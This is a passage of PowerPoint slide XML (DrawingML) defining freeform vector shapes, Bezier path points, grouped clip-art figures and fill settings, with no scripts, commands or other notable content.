                      <a:cubicBezTo>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="84"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="32"/>
                        <a:pt x="207" y="26"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="90" y="4"/>
                        <a:pt x="87" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="29" y="102"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="108"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="65"/>
                        <a:pt x="111" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="117"/>
                        <a:pt x="109" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="165"/>
                        <a:pt x="112" y="170"/>
                        <a:pt x="119" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="173"/>
                        <a:pt x="162" y="183"/>
                        <a:pt x="169" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="186"/>
                        <a:pt x="193" y="176"/>
                        <a:pt x="196" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="163"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="209" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="154"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="141"/>
                        <a:pt x="237" y="135"/>
                        <a:pt x="237" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="96"/>
                        <a:pt x="198" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="123"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="193" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="193" y="73"/>
                        <a:pt x="193" y="7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1" name="Freeform 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2079" y="1200"/>
                  <a:ext cx="87" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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5"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="48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2" name="Freeform 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1973" y="1424"/>
                  <a:ext cx="209" cy="237"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 159 w 159"/>
                    <a:gd name="T1" fmla="*/ 6 h 180"/>
                    <a:gd name="T2" fmla="*/ 132 w 159"/>
                    <a:gd name="T3" fmla="*/ 21 h 180"/>
                    <a:gd name="T4" fmla="*/ 81 w 159"/>
                    <a:gd name="T5" fmla="*/ 11 h 180"/>
                    <a:gd name="T6" fmla="*/ 72 w 159"/>
                    <a:gd name="T7" fmla="*/ 0 h 180"/>
                    <a:gd name="T8" fmla="*/ 68 w 159"/>
                    <a:gd name="T9" fmla="*/ 19 h 180"/>
                    <a:gd name="T10" fmla="*/ 17 w 159"/>
                    <a:gd name="T11" fmla="*/ 32 h 180"/>
                    <a:gd name="T12" fmla="*/ 1 w 159"/>
                    <a:gd name="T13" fmla="*/ 55 h 180"/>
                    <a:gd name="T14" fmla="*/ 1 w 159"/>
                    <a:gd name="T15" fmla="*/ 145 h 180"/>
                    <a:gd name="T16" fmla="*/ 36 w 159"/>
                    <a:gd name="T17" fmla="*/ 156 h 180"/>
                    <a:gd name="T18" fmla="*/ 43 w 159"/>
                    <a:gd name="T19" fmla="*/ 145 h 180"/>
                    <a:gd name="T20" fmla="*/ 42 w 159"/>
                    <a:gd name="T21" fmla="*/ 73 h 180"/>
                    <a:gd name="T22" fmla="*/ 42 w 159"/>
                    <a:gd name="T23" fmla="*/ 73 h 180"/>
                    <a:gd name="T24" fmla="*/ 42 w 159"/>
                    <a:gd name="T25" fmla="*/ 72 h 180"/>
                    <a:gd name="T26" fmla="*/ 42 w 159"/>
                    <a:gd name="T27" fmla="*/ 66 h 180"/>
                    <a:gd name="T28" fmla="*/ 42 w 159"/>
                    <a:gd name="T29" fmla="*/ 64 h 180"/>
                    <a:gd name="T30" fmla="*/ 42 w 159"/>
                    <a:gd name="T31" fmla="*/ 63 h 180"/>
                    <a:gd name="T32" fmla="*/ 59 w 159"/>
                    <a:gd name="T33" fmla="*/ 41 h 180"/>
                    <a:gd name="T34" fmla="*/ 103 w 159"/>
                    <a:gd name="T35" fmla="*/ 30 h 180"/>
                    <a:gd name="T36" fmla="*/ 103 w 159"/>
                    <a:gd name="T37" fmla="*/ 30 h 180"/>
                    <a:gd name="T38" fmla="*/ 59 w 159"/>
                    <a:gd name="T39" fmla="*/ 41 h 180"/>
                    <a:gd name="T40" fmla="*/ 42 w 159"/>
                    <a:gd name="T41" fmla="*/ 63 h 180"/>
                    <a:gd name="T42" fmla="*/ 42 w 159"/>
                    <a:gd name="T43" fmla="*/ 71 h 180"/>
                    <a:gd name="T44" fmla="*/ 42 w 159"/>
                    <a:gd name="T45" fmla="*/ 72 h 180"/>
                    <a:gd name="T46" fmla="*/ 42 w 159"/>
                    <a:gd name="T47" fmla="*/ 77 h 180"/>
                    <a:gd name="T48" fmla="*/ 42 w 159"/>
                    <a:gd name="T49" fmla="*/ 77 h 180"/>
                    <a:gd name="T50" fmla="*/ 43 w 159"/>
                    <a:gd name="T51" fmla="*/ 154 h 180"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 154 h 180"/>
                    <a:gd name="T54" fmla="*/ 43 w 159"/>
                    <a:gd name="T55" fmla="*/ 157 h 180"/>
                    <a:gd name="T56" fmla="*/ 84 w 159"/>
                    <a:gd name="T57" fmla="*/ 157 h 180"/>
                    <a:gd name="T58" fmla="*/ 85 w 159"/>
                    <a:gd name="T59" fmla="*/ 77 h 180"/>
                    <a:gd name="T60" fmla="*/ 89 w 159"/>
                    <a:gd name="T61" fmla="*/ 69 h 180"/>
                    <a:gd name="T62" fmla="*/ 141 w 159"/>
                    <a:gd name="T63" fmla="*/ 55 h 180"/>
                    <a:gd name="T64" fmla="*/ 159 w 159"/>
                    <a:gd name="T65" fmla="*/ 25 h 180"/>
                    <a:gd name="T66" fmla="*/ 159 w 159"/>
                    <a:gd name="T67" fmla="*/ 8 h 180"/>
                    <a:gd name="T68" fmla="*/ 159 w 159"/>
                    <a:gd name="T69" fmla="*/ 6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9" h="180">
                      <a:moveTo>
                        <a:pt x="159" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="17"/>
                        <a:pt x="140" y="23"/>
                        <a:pt x="132" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="20"/>
                        <a:pt x="94" y="14"/>
                        <a:pt x="81" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="10"/>
                        <a:pt x="73" y="5"/>
                        <a:pt x="72" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="19"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="68" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="19"/>
                        <a:pt x="28" y="28"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="36"/>
                        <a:pt x="2" y="42"/>
                        <a:pt x="1" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="55"/>
                        <a:pt x="0" y="135"/>
                        <a:pt x="1" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="163"/>
                        <a:pt x="25" y="165"/>
                        <a:pt x="36" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="153"/>
                        <a:pt x="43" y="149"/>
                        <a:pt x="43" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="130"/>
                        <a:pt x="42" y="102"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="68"/>
                        <a:pt x="42" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="63"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="50"/>
                        <a:pt x="48" y="44"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="37"/>
                        <a:pt x="101" y="30"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="28"/>
                        <a:pt x="107" y="28"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="30"/>
                        <a:pt x="68" y="37"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="44"/>
                        <a:pt x="43" y="50"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="74"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="155"/>
                        <a:pt x="43" y="156"/>
                        <a:pt x="43" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="180"/>
                        <a:pt x="84" y="177"/>
                        <a:pt x="84" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="142"/>
                        <a:pt x="85" y="80"/>
                        <a:pt x="85" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="74"/>
                        <a:pt x="87" y="70"/>
                        <a:pt x="89" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="69"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="141" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="159" y="47"/>
                        <a:pt x="159" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="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3" name="Freeform 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2089" y="1378"/>
                  <a:ext cx="119" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 28 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="8"/>
                        <a:pt x="28" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="66" y="38"/>
                        <a:pt x="91" y="32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4" name="Oval 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2069" y="1129"/>
                  <a:ext cx="105" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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00" name="Group 46"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1492" y="2848"/>
                <a:ext cx="866" cy="461"/>
                <a:chOff x="790" y="1889"/>
                <a:chExt cx="866" cy="461"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="709" name="Freeform 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1625" y="1949"/>
                  <a:ext cx="31" cy="234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0" name="Freeform 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1592" y="1949"/>
                  <a:ext cx="33" cy="234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1" name="Freeform 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="973" y="2116"/>
                  <a:ext cx="34" cy="234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4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2" name="Freeform 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1007" y="2116"/>
                  <a:ext cx="30" cy="234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3" name="Freeform 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="790" y="2066"/>
                  <a:ext cx="33" cy="234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4" name="Freeform 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="823" y="2066"/>
                  <a:ext cx="31" cy="234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5" name="Freeform 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1406" y="1902"/>
                  <a:ext cx="31" cy="234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4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6" name="Freeform 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1437" y="1902"/>
                  <a:ext cx="33" cy="234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7" name="Freeform 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1007" y="1949"/>
                  <a:ext cx="649" cy="207"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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8" name="Freeform 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="790" y="2066"/>
                  <a:ext cx="217" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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9" name="Freeform 57"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="790" y="1889"/>
                  <a:ext cx="866" cy="236"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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01" name="Group 58"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1841" y="2822"/>
                <a:ext cx="270" cy="180"/>
                <a:chOff x="1859" y="2279"/>
                <a:chExt cx="372" cy="247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="702" name="Freeform 59"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2412"/>
                  <a:ext cx="372" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25173"/>
                    <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T3" fmla="*/ 0 h 6756"/>
                    <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                    <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                    <a:gd name="T8" fmla="*/ 0 w 25173"/>
                    <a:gd name="T9" fmla="*/ 3378 h 67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173" h="6756">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25173" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="6756"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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03" name="Freeform 60"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2045" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12588"/>
                    <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12588"/>
                    <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T5" fmla="*/ 964 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T7" fmla="*/ 0 h 4342"/>
                    <a:gd name="T8" fmla="*/ 0 w 12588"/>
                    <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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Freeform 61"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
